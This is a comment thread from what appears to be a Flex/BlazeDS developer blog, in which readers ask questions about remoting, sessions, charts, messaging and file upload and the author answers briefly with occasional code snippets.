Please visit the URL below for details on Remoting with WEBORB.
Hope this helps.
Hi Kumar,
I don’t think you can do this with out a JSP wrapper 🙂 You basically need a JSP/container/server which will accept a POST/GET from the SSO server. If you are worried about passing these values as Flash Vars, you can consider adding the values in a persistent storage on the server and generate an ID for the same. Now pass this ID to your Flex application and get the values SECURELY from Flex application using the ID from the persistent storage. 🙂
Hope this helps.
hi…
i am new flex,here i need to add some java jars and corejava files in my flex desktop application,but i donot know how to make this and use those *.java FILE IN MY FLEX PROJECT..PLZ HELP ME TO DO THAT.ur help is important
thanks and regards
arun
Hi,
i am a coldfusion developer and a flex aspirant. i want to know how we can integrate flex with blazeds and coldfusion. i dont know much abt blazeds. Can we make a chat applicatin in coldfusion with blazeds support and integrate in a flex site? I have tried ur example with blazeds and java and was quite helpful. but the problem is how we can use blazeds along with coldfusion. is there anything we need to change in the CF admin for the blazeds to work along with CF.Is that possible? any tutorial links would be helpful..thnx..
Hi Sujith,
Nice articles. In your post “Session data management in Flex Remoting” you talk about calling static method FlexContext.getFlexSession() for Flex Remoting. But, I’m using Servlets. Normally you set objects in HTTP session. But Flex also has one session, and due to some reason 2 sessions are getting created. So I want to access the flex session instead of creating http session in servlet. I tried FlexContext.getFlexSession() but it doesn’t work. It returns null. Can you tell me how to achieve this?
Thanks,
Romil Sinha
Hi Sujit,
I got your reference from Sambhav Gore in Bangalore.
I have a few queries related to session management in BlazeDS.
1. Once a session has been established, how do we ensure that the next request coming in is from a valid user.
2. How does cache management work in Flex. Is it possible to maintain data at the client side for the specified amount of time?
Thanks,
Rabiya
Hi Rabiya,
1. What exactly do you mean by valid user ? if you meant the same user, then you can just check for some object stored in the session. Requests from same user will return one session object
2. Flex is state full client, any instance of the objects created will remain as long as the user doesn’t reload the entire SWF. That is by refreshing the page loaded. If you want to store a object only for a specified amount of time, you can use a Timer and then remove the instance end of the period.
Hope this helps.
Hi Romil,
In a Servlet you can get the FlexSession object. It is stored in HttpSession as an attribute. Please get attribute named “__flexSession” from the HttpSession. FlexContext.getSession() works when the request is received my the MessagebrokerServlet only.
Hope that helps.
Hi Ajith,
You can integrate ColdFusion and BlazeDS. Please visit the URL below for more details.
Hope this helps.
Hi Arun.
As of today you cannot do this with just AIR. You can try having a look at Merapi project, this will act as bridge between AIR and Java. Please find more details at the URL below.
Hope this helps.
Hi Sujit,
Is it possible to deploy a flex application using remoting and lcds to a different server? ie remove the flex app from the java web app and deploy it on another server – like a web server?
The reason I ask is that when running the sample apps on a fresh lcds 2.6 install using flex builder, there is no option to change the output directory. And when we run the samples the desitination cannot be found. So I assume that the flex app must be contained within the lcds web app?
Is there any way around this? And is this the same situation with AIR apps (that they must be deployed to the lcds web app?
Hi Sujit,
I have a real urgent question:
I want a LineChart to be drawn.
I have these Timestamps [84, 1000, 34000, 34699, 439999] who are representing the x-Value of DataPoints along the X-Axis.
Unfortunately the distance between 2 nexted datapoints along the x-Axis is always the same, that means that between the points with x-values 84 and 1000 is the same distance along the axis as between the points with x-values 34699 and 439999.
But the distance between points with x-values of 34699 and 439999 should be much greater than between 84 and 1000.
How can I customize the distance between data Points on a LineChart to solve my Problem?
I really dont know right now and I did not find a solution yet.
Would be very nice to get some hints.
Greeting,
Frank
Hi Matt,
You should be changing the end-point URLs of the channels you are using. Please find more details in the article below.
Please check out the comments also.
Hope this helps.
Sujit. Hope you can provide some help?
I have a simple read/write project in Flex 3 using Blazeds to access a java class.
The program runs fine within the Flex Builder environment. However, it does not run from the bin-release compiled version. It doesn’t seem to be talking to the Tomcat server.
I am trying to write to a file name which is absolute: ie, c:\\….
I have also tried using a UNC path to the file and it doesn’t work at all.
Got any suggestions?
A followup on the post 121.
When the write option is selected an long error message appear that completely scrolls off the page. However, some of the path names try to point to a directory called messagebroker which does not exist. I don’t know what it is trying to reach?
Thanks in advance
Is there a way to override Responder.as class.
My requirement is at one place i should be able catch all the faults occurred with the Remote/HTTP object invocation.
How to block copy/paste for “TextInput” in Flex.
Hi Bob,
I didn’t get what your application is trying to do. Are you trying to write into a File on client system or is the File on the server?
Hi Amarnath,
Did you try just extending that class? Didn’t that work?
Hi Amarnath,
Please try the keydown event.
Hope this helps.
Reply to post 125:
In development mode, I have a Tomcat server on my local computer which is inside blazeds. Inside the webapps is a java class as well as server-config files that have destinations for Flex. The client interface has been built with Adobe Flex 3 Builder. The java script has two functions: one that writes a line to a file and another that reads a file. The file name is specified in the Flex client.
hi sujeet,
We have an existing struts based application.I want to change the view (jsp to flex).I followed some examples and got stopped by one problem.response from struts is coming to jsp(where i build xml )and jsp to flex.how can i avoid this intermediate jsp. Please help me regard this.
can u provide me a detailed example of using fx:stuts.I followed some examples in net none is more helpful to me
sameer
Hi Sujith,
How to work with SSL enabled WebServices.
If u have any samples or Tutorials. Can u please ping us.
Hi Sameer,
FxStruts solves this problem. Please find detailed example at this URL
Hope this helps.
Hi Sujith,
thanks for the link; i had seen the Developer guide;
but the “Flex client API” section will be very useful. the problem was not to do with weborb (.net) or with flex receiving or working with the array. the array i was passing had blank entries in it when i later tested the array in a different way.
thanks in any case and regards
Hi Sujith,
Can I embed a .swf into another swf file and have them both communicate like pass params etc.. is there a way to do this ?
Regards
-Chandu
Hi Chandu,
Please try SWFLoader, ModuleLoader or LocalConnection.
Hope this helps.
Hi Daniel,
Problem might because the properties in the object being passed are not public. Can you please check if the properties are public. If you debug your Flex application from Flex Builder, you can see message in the console if there is a problem setting properties of the object on the Flex side.
Hope this helps.
Hi my name ia M.V.Narayana. iam working in java and flex technology. Totally iam having 2+ experience .Any one can send me resume mvn.flex@gmail.com please.
Thanks
Dear Sujit,
I am looking at adding BlazeDS to an existing Tomcat/JSP application for which we have a functioning web services Flex/AIR app. The app handles lots of images and I felt that AMF would be a good way to improve comms performance.
However, I am a bit confused. How can I take all my existing JSP based API’s and port them to Blaze so I can use AMF. Today we use Cairngorm as the MVC and HTTP services to do the requisite get and post actions.
I just need a little pointer in the right direction.
Sincerely Greg
hi Sujit,
Topic: Querying a MYSQL database and generating pdf reports
dear Sujit,
I have a problem sending a list in jave that should fill a data grid.
The data source of mine is a list of HashMaps, each HashMap contain a key/value that should represent the column name and its value.
In all examples the data was taken from a database of some sort and created a designated beans with properties.
Is it possible to create a simple list of HashMaps and send it remotely to be the DataProvider?
Thanks a lot
Jo
hi sujit,
can you please tell me how can I store data from my flex application directly on hard disk of my computer.like If i am writing a text file in my application then how can this be stored as text file on hard disk.
Hi,
I need to generate some objects at serverside based on some conditions and these objects will be pushed to client (not pull). Can you provide me any sample code snippet for this.
Thanks,
Prabhakar.
Hi,
I need to generate some objects at serverside based on some conditions and these objects will be pushed to flex client (not pull) using blazeDS messaging services. Can you provide me any sample code snippet for this.
Thanks,
Prabhakar.
Hi,
This is Sri Tej, Adobe Student Representative for RIA.I met you on Feb 28th at Hyderabad.As you have seen the Multiplayer gaming environment, My next plan is to develop a Multi-player Game Which is also 3-D version using Flex. Can you Please Help me out in developing a 3-D environment some thing like a room or a person standing or such.. Do we have any tools to develop such 3-D environment using Flex..?
Thanks,
Sri Tej.
Hi Joe,
Yes, you can. You will get the HashMap instances as instances of Object.
Hope this helps.
Hi Masood,
Please check out article at the URL below.
Hope this helps.
Hi Prabhakar,
Please find details at the URL below.
Hope this helps.
Hi Sri Tej,
Please visit URLs below for useful resources for 3D in Flash.
Hope this helps.
Hi Sujit,
I’m new to flex.I have been trying to use ExternalInterface.addCallback in IE 7 to invoke ActionScript functions from javaScript.It does not work.IE does not show any error.It just skips the statement & executes the remaining statements.Can u please explain with an example.
Thanks,
SK
hi sujit,
can u send me sample example that explains complete flow of execution includes user enters details and request goes to controller and executes action then the values posted in database. And the response should come back to the flex.
Add details and retrive details exapmle please.
Dear Sujith,
I am new to the adobe air and i make an appliaction to be a container for pdf forms, the problem is i want to pass variables from the adobe air to the pdf (integrate AIR and PDF together) and in the same time i want when i save the data in the pdf file itself the pdf file disappear and throw me to the adobe air.
please i need help in this urgent
Hi Sujit,
I have a bar chart application.
In one series its shows customer importance and in the other customer satisfaction is shown.
My requirement is draw a rectangle at the end of the customer satisfaction bar series if the customer satisfaction is less than customer importance and show the difference in a label inside the rectangle.
If the customer satisfaction is greater than customer importance then draw the rectangle within the bar series and show the positive value in the rectangle.
Inorder to do this I have created a custom bar series named “SatisfactionGapBarSeries” extended from the Bar Series and custom box item render named “SatisfactionGapBoxItemRender”.
In the updatedisplaylist of the SatisfactionGapBoxItemRender i have drawn rectangle according to my need but i am not able to add the label.
How can i add a label into the drawn rectangle?
Will you please help me?
Regards
aK
Software Engineer
Satmetrix
TechnoPark
Trivandrum
hai sujit,
i m working on flex….i wanted to impliment ActiveMQ concept for one of my application…so can you plz send me some sample apllication wich is using activemq message broker….
Thanks in advance??
I have a strange problem with Blaze DS. I am using Flex SDK 3.3 and BlazeDS 3.2 ( also tried 3.3)
I have a A/S been mapped to a Java Bean on server side.I am able to retrieve a collection of such beans from server, and they are mapped properly. I am calling a method on my remote object which takes this bean as the only argument. But I am getting the following error
[FaultEvent fault=[RPC Fault faultString=”Cannot invoke method ‘addEquipment’.” faultCode=”Server.ResourceUnavailable” faultDetail=”The expected argument types are (com.gtech.esrs.rm.core.beans.MiscEquipment) but the supplied types were (flex.messaging.io.amf.ASObject) and converted to (null).”] messageId=”9E8C3D0A-D00A-B927-E2B4-A37CA5BDCF52″ type=”fault” bubbles=false cancelable=true eventPhase=2]
The similar error is displayed in the server log, indicating somewhere the [RemoteClass] meta data is being lost during serialization.
Could you please help.
Thanks
Hi SK,
Please make sure you have everything properly setup as explained in the URL below. If your problem persists withe everything in place, code to reproduce the issue will help in understanding the problem.
Hope this helps.
Hi aK,
Instead of drawing a rectangle, try adding any of container/component.
Hope this helps.
Hi Namita,
Please find samples at the URL below.
Hope that helps.
Hi Manish,
Resource unavailable is thrown when the Class is not found. Can you please confirm that the objects of the mapped class type are properly converted to appropriate AS class type. If the objects are properly converted and is creating problem when sending back, please share code to reproduce the issue. Please send to sujitreddy.g@gmai.com
Hope this helps.
hi Sujit,
I’m trying to find a solution for debugging PHP service classes when used as the back end for Flex apps. I’d prefer not to fork out extra money for the Zend Studio at the moment and from what I read about PDTv2, it seems like all I need.
While I can set break points on individual PHP files and step through the code, I can’t seem to trigger a break point in a PHP service class when invoked from a Flex app.
Can you offer any help or advice?
cheers
Woohoo! Scratch that I got it working.
I followed these instructions to install XDebug:
I had to compile the xdebug.so plugin from the v2.04 source for it to install properly under MAMP – luckily someone posted this info in the comments below the post.
Installed PDTv2 via Eclipse software updates:
But then I could not get Firefox to connect to Eclipse – the issue seems to have been some faulty prefs in Eclipse. I just created a new workspace, created a new PHP project pointing to my Zend services directory and imported my Flex project.
It’s probably sad how excited I am to have this working. No more looking at PHP error logs (well less anyway).
cheers
Hi Sujit,
I am a Flash developer for al long time now and I am trying Flex since 1.5 whenever I get time, I had developed a sample application in Flex2 with coldfusion as middle layer and the MSAccess db, it worked out to b well but went on getting complex as the size increased and I got stucked.
I have gone through and somewhat understood the BlazeDS structure and worked around the examples too, since I cannot install FlexBuilder I am again stucked in compiling Flex3 files on command line comipler which will be deployed on preconfigured tomcat which comes with the BlazeDS Trunkey download whic is for free.
The same thing is with Carngorm architecture I have gone throught the documentation and some what understood but could not implement due to the lack of any sample application which is with the CG framework and the actual sample application sourcecode, which will make it easy for me to understand the structure in details and help me develop the application on CG framework without any fear.
I am seeking your help on following points:
1. Any small sample cairngorm implemented application along with cairngorm framework used in it and the application source code, to understand the CG framework in actual use.
2. What are the steps to compile the flex application on command line for BlazeDS, so that it takes the configuration from the service-config.xml or other service related xml rather than the default flex-congif.xml. [in short how to compile the flex application on command line using Flex SDK 3 not FlexBuilder to make it work on BlazeDS]
It would be a great if you would help in these points.
Thanks & Regards,
Iresh SA
this is my mxml code
this my java code
package com.codeofdoom;
import java.util.ArrayList;
import java.util.List;
import java.util.Random;
import flex.messaging.MessageBroker;
import flex.messaging.messages.AsyncMessage;
import flex.messaging.messages.Message;
import flex.messaging.services.MessageService;
import flex.messaging.services.ServiceAdapter;
import flex.messaging.util.UUIDUtils;
public class BlazeDsServiceAdapter extends ServiceAdapter
{
Random random;
PersonGenerator thread;
public BlazeDsServiceAdapter()
{
random = new Random();
System.out.println(“Adapter initilized”);
}
public void start()
{
if(thread == null)
{
System.out.println(“Adapter started”);
thread = new PersonGenerator();
thread.start();
}
}
public void stop()
{
System.out.println(“Adapter stopped”);
thread.running = false;
thread=null;
}
private List generatePersons()
{
List arr = new ArrayList();
for (int x=0;x<5;x++)
{
Person p = new Person();
p.setFirstName(“FirstPerson”+x);
p.setLastName(“LastPerson”+x);
p.setAge(random.nextInt(80));
arr.add(p);
}
return arr;
}
public class PersonGenerator extends Thread
{
public boolean running = true;
public void run()
{
String clientId = UUIDUtils.createUUID();
MessageBroker msgBroker = MessageBroker.getMessageBroker(null);
while (running)
{
AsyncMessage msg = new AsyncMessage();
msg.setDestination(“BlazeDsServicePush”);
msg.setClientId(clientId);
List a = generatePersons();
msg.setMessageId(UUIDUtils.createUUID());
msg.setBody(a);
msgBroker.routeMessageToService(msg,null);
try
{
Thread.sleep(5000);
}
catch(InterruptedException e)
{
System.out.println(“Exception”);
e.printStackTrace();
}
}
}
}
@Override
public Object invoke(Message message)
{
System.out.println(“message——–” + message);
if(message.getBody().equals(“New”))
{
// System.out.println(“true”);
System.out.println(“Adapter received new”);
return generatePersons();
}
else
{
//System.out.println(“false”);
System.out.println(“Adapter sending message”);
AsyncMessage newMessage = (AsyncMessage)message;
MessageService msgService = (MessageService)getDestination().getService();
msgService.pushMessageToClients(newMessage, true);
}
return null;
}
}
i want compare the msg in invoke method but it is not taking what i published in flex it taking some other data like this
message——–Flex Message (flex.messaging.messages.AsyncMessage)
clientId = 2648E184-810D-494A-08CF-B8B0BAB10C99
correlationId = null
destination = BlazeDsServicePush
messageId = 266A6A61-1D0C-4E49-01DC-C352B839495E
timestamp = 0
timeToLive = 0
body = [com.codeofdoom.Person@1a1ff9, com.codeofdoom.Person@12943ac, com.codeofdoom.Person@19ed7e, com.codeofdoom.Person@3727c5, com.codeofdoom.Person@1140709]
Adapter sending message
message——–Flex Message (flex.messaging.messages.AsyncMessage)
clientId = 2648E184-810D-494A-08CF-B8B0BAB10C99
correlationId = null
destination = BlazeDsServicePush
messageId = 266A9A10-2509-4F0F-6609-00A73D3053A5
timestamp = 0
timeToLive = 0
body = [com.codeofdoom.Person@1f95165, com.codeofdoom.Person@14ed577
can suggest some way to overcome this
Sujith,
I am having Jboss as my application Server and using Flex for my front end . Essentially I am to convert one legacy application into a Flex one . I am running into the problem
a lot . In the Java Code of the application lot of application specific Parameters are stored in Request Object and Session Object .is there a way by which I can access HttpSession , HttpRequest object in Flex .
In java if i do session.setAttribute(“userName”,xxx);
request.setAttrinute(“userName”,xxx)
how will i do session.getAttribute in my mxml .
Hi Sujit,
First of all I have found your blog extremely helpful as I’m just starting off flex. As a part of my project, I am required to upload an image from the client to the server and I’m using a servlet to handle this request. You might have guessed I’m using Java at the business tier. I found a tutorial using the FileReference object and it seemed to be very clear. The JSP code present in the comment section of that blog doesn’t seem to work whenI try to use a similar code in the doGet() method of my servlet.
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
try{
DiskFileItemFactory factory = new DiskFileItemFactory();
ServletFileUpload upload = new ServletFileUpload(factory);
List list = upload.parseRequest(request);
for(FileItem items: list){
File uploadedFile = new File(“H:/”+items.getName());
items.write(uploadedFile);
}
}catch(Exception e){
e.printStackTrace();
return;
}
}
This is just a test program but it doesn’t seem to be working. When i submit the file for uploading on the flex front end, it continuously says ‘waiting for localhost’ (I have verified the URL of the servlet and the one mentioned in the URLRequest). When I directly try running my servlet on the server, I get a classNotFoundException for FileItemFactory even though I have imported it.
Do you know why this is happening or If i can do this in an easier way without using BlazeDS?
Your suggestions would be valuable.
regards,
Nikhil
Hi Sujith,
I would like to send XML data from a remoting service to my flex client. How Can I achieve that ? Can i send an XML string and how do I create XML using that string on the client side ?
Any help will be appreciated.
Regards
-Chandu
Hi Iresh,
For configuring your services-config.xml to your Flex project you just have to add -services “\services-config.xml” to your compiler arguments
Please find developer documentation for Cairngorm at this URL
You will find sample at this URL
Hope this helps.
Hi Raj,
Instead of setting the objects in the session or the request, you can send those objects to Flex application from your Java classes. Please find details on how to invoke Java methods from Flex application at the URL below.
Hope this helps.
Thanks Sujith. Well I did anyalyze this option , but Since i am a newbie I always thought there must be a straight forward way to store session .
The problem is I have a jsp page which calls a Controller
login method on failure it redirects to a page and sucess it redirects to different page . It is not structs completely but still works on the similar concept of Structs .I use Java Page Flow.
I had written the first login.jsp —-> login.mxml
login.xmlml Parts of Code where I have issues.
{userName.text}
{password.text}
private function validateForm(evt:MouseEvent):void {
if(validated)
–call registrationRequest.send();
I have two functions handleResult and handleFault. This is where my main question is .
This is my Controller method Login.do
method login(
@Jpf.Action(forwards = { @Jpf.Forward(name = “success”, path = “MainV2.jsp”), @Jpf.Forward(name=”retry”, path = “welcome.jsp”) })
public Forward login(Controller.loginForm form) {
Forward forward;
call db validtor
if(validated)
return forward(sucess)
else
session.setAttrinute(“errorMessage”, “error message from db”);
return forward(failure)
}
Now I dont know what is the problem , no matter what if there is no exception also , i get debug messages in the handle fault method of MXML . I dont hit the handle result case .
I am not sure why ? How would i handle this if sucess redirect to different mxml , error show message from db .
I would apprectiate if you point me to some example .
2. Second question . I have two list boxes in my MXML . I want to add , add all , remove , remove all the values from the two list boxes . Is there any example for that too .
Thanks
}
Hi Chandu,
org.w3c.dom.Document objects from Java are converted to XML class type by default. You can also send String from Java and convert that to XML using XML(yourXmlString)
Hope this helps.
Hi Nikhil,
Try doPost method in your Servlet.
Hope this helps
Hi Raj,
You don’t have access to session or request on Flash. You will have to write code on your server which will get the data for you. How exactly is the flow? Are you using Struts?
Thanks . Sujith , I am not using Struts . I use Java Page Flow, which is similar to Struts . Now that we don’t have session or request objects on the session, I have to change the whole JSP to Flash is alot of work.
Hi Sujit Reddy, sorry but I don’t speak english. I have a question…
it’s posible retrieve data from a database on MySQL to application in Flex with LCDS and Data Management Services, but without having a flex client that notify all other clients… ie, that LCDS verify the changes in the database it automatically, by example if you enter data in the database from the console of mysql, that Flex LCDS detect changes and update the view in client Flex with Data Management Service, not AMFPolling.
Hi Suji..
This is Ashok.. Am download your gmail contact retrieve project.. your project only run in AIR.. but am convert into web browser .. am not able to retrieve gmail contacts.. please give IDEA for me..
Hi Suji..
This is Ashok.. Am download your gmail contact retrieve project.. your project only run in AIR.. but am convert into web browser .. am not able to retrieve gmail contacts.. please give IDEA for me.. What can i do..
hi sujit,
I face the below problem in module loading using module loader. Can u please suggest me where I might be wrong.
Thanx in deed.
TypeError: Error #1009: Cannot access a property or method of a null object reference.
at mx.containers::Panel/layoutChrome()
at mx.core::Container/updateDisplayList()
at mx.containers::Panel/updateDisplayList()
at mx.core::UIComponent/validateDisplayList()
at mx.core::Container()
Can you please say whats the key difference between these three classes
1.SWFLoader
2.ModuleLoader
3.ModuleManager
Thanks
hi Sujit,
i am trying to create Flex portlets in RAD and configure it in WebSphere Portal Server 6.0.
1) know how to create jsp portlet in Portal Server, to create Flex portlet is there a need of FlexPlugin in RAD as per these below PDF
uses FlexTagLib in jsp.
2) how to configure Flex Portlet in Portal Server with BlazeDS to invoke Java method using Remote Object…..this is much different than BlazeDS with tomcat.
may be if BlazeDS is configured properly in PortalServer than Flex can invoke Java method same as in tomcat.
please reply soon.
Hi Sujit,
could you tell me how to bind datepicker with datagrid in blazeds.
Hi Sujit,
could you tell me how to bind datefield with datagrid in blazeds.
Hi Sujith,
Can provide a simple example of writing and dispatching custom events in AS3.
Regards
-Chandu
Hi Sujit, I need to send an ActionScript object to servlet and return the object in CSV format. Could you please share some sample code how to pass the AS object to servlet and how to receive the AS object in servlet?
Hi Sujit,
I vaguely remembering some real AVM level tutorial pdfs long back (Jan 2007). I was searching for them offlate and couldnt find them. They deal with the memory managmeent model of Flex and 3 frame execution of Flex application. Do you have any idea where they are found? And also I am looking at indepth discussion of Flex/Flash rendering mechanism and memory model (Threading and event based). Plz do let me know if you have come cross them.
Thank you
Regards
Ravi
hi Sujit,
I want to create and save a folder in my machine using a flex application, can i do this with SharedObjects?
Thank you
Hi,
I have a problem using BlazeDS. I have a big application in Flex using remoting with BlazeDS. That’s works fine but my messagebroker crashes sometimes when my application is running and after that, calls to BlazeDS don’t works anymore.
It happens after many calls (sometimes 200, sometimes more than 1000…).
I tried to use many channels instead of only one, no result.
Is it a limitation of Blaze? Thanks.
Hi Mike,
Hope this helps.
Hi Ashok,
Yes, that might not work in web application cause, Google doesn’t have a crossdomain file defined.
Hope this helps.
Hi Selva,
Looks like some property is null, can you please share code to reproduce this?
Hi Vasu,
Never tried this, but configuring BlazeDS properly and making sure your Flex based portlet is sending request to BlazeDS will get it working. Please check out the articles at the URLs below.
Hope this helps.
Hi Shilpa,
What exactly do you want to do? which property of DateField you want to bind to which property of DataGrid. Can you please explain.
Hi Sujit, thanks that’s what I needed: D in fact was doing well, but the problem is not within the class by invoking the server. thanks 😀
Hi Chandu,
var e:Event = new Event(“EventType”);
dispatchEvent(e);
Hope this helps.
Hi Prakash,
Please check out the URL below.
Hope this helps.
Hi Ravi,
Please check out the URLs below.
Hope this helps.
Hi Jzy,
Sharing error messages from the Flex application or from the server logs will help in finding out what might be going wrong.
Hi Sujit,
I am trying to pass the elements of my dynamic list from Flex to JSP..
Can you tell me how can that be done?
Hi Nidhi,
Please try sending them as comma separated values or key value pairs using HTTPService.
Hope this helps.
hi sujit,
Im using the resourceManager.loadResourceModule(resourceModuleURL); to load my messages property files in my main application . Also Im using modules in my application.
In the modules Iam not using this below tag
[ResourceBundle(“messages”)]
But still my application is loading correctly the messages from the messages.properties file.If so Whats the purpose of this metadata tag.
10x in deed. Can u please make clear that.
Hi Sujit,
Thanks.. That helped.. 🙂
Hi Sujit,
Is it possible to read from a DataGrid if it is empty? If yes, then how? .. I tried using many ways but it doesn’t run.
IE7 with https under cross domain throws the following error: Security error accessing url” faultCode=”Channel.Security.Error” . A link identified this issue as a IE bug that can be circumvented by using one of the following http header parameters:
Cache-Control: no-store
Cache-Control: no-store, must-revalidate
Cache-Control: no-store, must-revalidate, max-age=0
Cache-Control: must-revalidate
Cache-Control: max-age=0
Do you have any insight?
Hi Sujit,
1) I had made portal project in RAD, by using simple “Hello” Flex application (i.e. used generated swf file ) able to view flex application properly in portal server.
2) if i will use RemoteObject tag in Flex application, made MessageBrokerServlet entry in web.xml for rmi connection. In same project created java class and made corresponding entry in remote-config.xml.
My Question
1)By refering to swf file in jsp through WebSphere Portal Server it is possible to invoke JavaObject using RMI?, if both are deployed on same war file.
2)while creating Flex project where should i point to i.e. Root folder, Root Url, Context Root. because i am using WebSphere Portal Server.
In “creating Blaze channel at runtime”, i think it talk about without making entries in remoting-config.xml should be configured in Flex application.
thanks in advance.
Hi Sujit, this is a very useful website. Question:
We are trying to slowly integrate Flex 3 into an existing web app. We plan on adding the Flex client into iFrames where appropriate. The problem that I’m addressing is how to integrate a mixed J2EE/Flex client into a single web app on the server. For the Blaze side we want to hit java classes via destinations.
The web.xml file contains a which forwards to a .jsp login form (we’re using FORM auth-method). When the BlazeDS url-mapping is added to security-constraints any RemoteObject calls will hit this login-config servlet. That’s OK. We know it’s requesting the Blaze servlet and can try to respond accordingly (i.e. not returning the HTML logon form).
I tried returning an AMF3 object back to the client (a string that said “noAuth”) but the Flex client had no clue and spewed a “BadVersion” error. I was hoping to have the client recognize some kinda specific String/error so that it could prompt the client to logon (say, in the event of a session timeout while in the Flex portion of our app). I also prefer to avoid creating my authentication via Blaze as both my J2EE client and Flex app are sharing the same session and thus the same timeouts and other settings.
This seems like a good strategy but I just can’t figure-out how to make it apply. If this isn’t a good strategy do you have any suggestions given this issue? Certainly we can’t be the only Java shop trying to slowly migrate Flex into our web applications. Thanks.
-Doug
Hi Sujith,
My task is as follows ,
a) I have an AdvancedDataGrid , I have to render icons and label coming from the server . icon data from server comes as byte array. So I created a an image render which has an HBox and to the HBox I added an Image class and a Label Object. I am able to see icon and text as expected,
now when the user clicks on the cell, I wanted a ComboBox to drop down with choices which again should show the icon and text.
b) so I created a new class extending ComboBox and I created another image renderer , which is the ItemRenderer for the ComboBox. The dataProvider is an Array of Strings, In the image render based on the “data” property I set the Image and Label in t he renderer
c) now I set the itemEditor as the above custom ComboBox
All the above works fine to a certain extent. However when ever I click the Cell the cell changes to a DropDown List and starts showing the “string” from the Array which was the data provider for the ComboBox. and when I click cell again the DropDown List opens and I see the Icons and Text, I want to avoid showing the “text” part when I just click the cell
Hope I was able to explain clearly.. if you have an exmaple or a refernce to some material on how I can achieve this I will be gratefull
Regards
-Chandu
Hello,
We are trying to build a high definition PDF (300 dpi, for book printing) from pages designed in a FLEX tool ( like scrapblog.com)
The flash is included in a web site written in Java/J2EE, so the PDF generation will take place on the Java server (based on a description of the pages sent by the flex tool with BlazeDS
We need 300 dpi definition and the ability to build the PDF without any template (since the user will be able to change the layout of the pages he wants to print : the description sent by the flash tool includes the location, orientation and source of all the elements in each page).
From what we have seen up to now, the lack of a template can be difficult to handle with java libraries.
Any idea how such a PDF can be built in Java ? Or lacking that, with other languages (such as PHP) which could be added on the server side.
Thanks for your help.
Hi sujith,
How to open a browser window from air application. for me its showing sandbox exception.
SecurityError: Error #2121: Security sandbox violation: navigateToURL: app:/demo.swf cannot access about:blank. This may be worked around by calling Security.allowDomain.
i need to open all http,https ….
Thanks
Sharath
Hi Nidhi,
access the dataProvider property of the DataGrid.
Hi Ragvendra,
I think this is a IE bug and this solution should help.
Hi Vasu,
You need not set the root folder, please visit the URLs below for more details.
Hope this helps.
Hi Doug,
Please check this article
Hope this helps.
Hi Sujit,
I have been trying to setup Custom wrapper in JSP for my flex application so I can get some header variables. But I am getting errors in passing the Flash Vars. Can you please recommend best way to do this.
Thanks,
Karunya
Hi Sujit ,
Below is a very simple Flex app. containing the main screen with a Button (main.mxml) and a Form-based component , located under src/components .
I would like to know how to use the Button to display the Form component when clicking on it ; the method that i added to the button is : click=”showForm()” .
Thank you very much
Main.mxml
Hi Sujit,
It seems my previous post is incomplete … I’ll try again .
Thanks
main.mxml
////////////////////////////
…..
mx:Button x=”246″ y=”242″ label=”Button” click=”showForm()”
… etc
////////////////////////////
services
service-include file-path=”remoting-config.xml”
service-include file-path=”proxy-config.xml”
service-include file-path=”messaging-config.xml”
services.
From mxml application remote object method working properly
but RemoteObject error when calling from within a Module
is it possible or not?
can you give me some clarification reagrding this
thanks
Dhanya
Hey Sujit,
First of all, thanks in advance for any help you could bring to me. I really appreciate your time on this.
Now, I’m working with Charts, right now I’m facing the problem, of the label on the chart. By request of my client, he is asking me to solve the issue that comes up when the label it’s too big, and the graphic (BarSerie) too short, so then the label appears as “…” ok, yes we do have the tooltip, but those graphics are also exported as PDF files, and the requiere to have the graphic information on the report, so I thought that might be a way to specify dinamically to the BarSerie the labelLocation property.
My problem is that I’m not really a Flex programmer, I had been focused on Java but the client asked me to create this project as this interaction Flex + Java + Oracle. So…
Do you thinks is there a way to create that dynamic position?
Also, on the same project and as a plus of the strategy… And taking the advantage of your knowledge, I’m exporting to PDF and Excel, but right now I’m using a JSP page to call the interaction to the exportation. So the way I’m exporting to PDF is using AlivePDF, no problem there, because that API allows me to add images, so there I add the chart object. The problem comes up, when I’m trying to export an image to the Excel file.
I just started to read about as3xls project on googlecode. But if you have some sample that I can use, would be wonderful!
Once again, thanks and thanks and thanks in advance.
I’ll be waiting on your answers!!
Have a gr8 day!
Mike
Hi Sujit,
I am new to blazeds, I have few concerns regarding multithreading in the context of remote objects. Currently, who takes care of the mutl threading issues (like those handled by tomcat servlet contaier),when the destination invokes the java object through the adapter for the given destination?
Hello Sujith,
Hope you remember me . Could you please help me on export to excel functionality. How will i export a datagrid to an excel?
Thanks,.
Jayakumar Aravind
Hello Sujith,
I am facing problems in Adobe Air Version..I had AIR 1.0 ,I have updated it to 1.5.1 but still its installed in the folder 1.0.
When i create a new Flex project it shows Adobe version 1.0 is used.
My major concern is i want to use Text layout Framewok and it minimum requirement is 1.5.
Please reply ASAP.
Hi Sujith,
I am using Blazeds-Tomcat Integrated version.Whenever I run my flex application it creates a new session for Blazeds in Tomcat.The number of sessions for Blazeds is not increasing above 22 (seen in the Tomcat Manager).If I run my application for the 23rd time , my application says it is out of memory.
Can u suggest a solution for increasing the number of sessions ?
Thanks in advance and awaiting your reply at the earliest,
Shyam Sundar.A
Please send me link to download blazedsMonster
Hi Neeraj,
Please download from this URL
Hi Sujit,
Iam new to Flex. Iam exploring Flex and Blaze DS capabilities. My requirement is like this.
I have my Plain Java Object in Server A and flex application deployed in Server B. And I need to invoke Java Object running on Server A from flex client application which is deployed on Server B. Is this possible to do with BlazeDS web application.
Please note that retrieving data from db via the same code works perfectly fine….
Need some help!!! Yes, some stuff is missing, but i can added if need be to be assisted. clarity and making sure i didn’t overload the page was the reason for not including everything….
thx in advance….
My Error is:
[RPC Fault faultString=”Channel disconnected” faultCode=”Client.Error.DeliveryInDoubt” faultDetail=”Channel disconnected before an acknowledgement was received”]
.
.
.
Here is my Code:
VO – PHP
VO – AS3
Service:
MXML:
Ok…. so i have narrowed it down to this:
1. my variable data does get recognized through the “tunnel”, Flex debug says so
2. I am able to insert “something” garbage into the db
3. i need to find out what is the correct string for the insert syntax with flex, zendamf and php
4. the data that the db gets is:
depending on my db schema i get more or less characters
What is the correct syntax for the $query = sprintf(” blah ????? url) on click of item.
Also please advise me, is it possible to hide the components such as panel and other components and they should be shown on particular event occurance.
Please help me
Thank you
Hello Sir,
small correction in the previous post. alert message) on click of item.
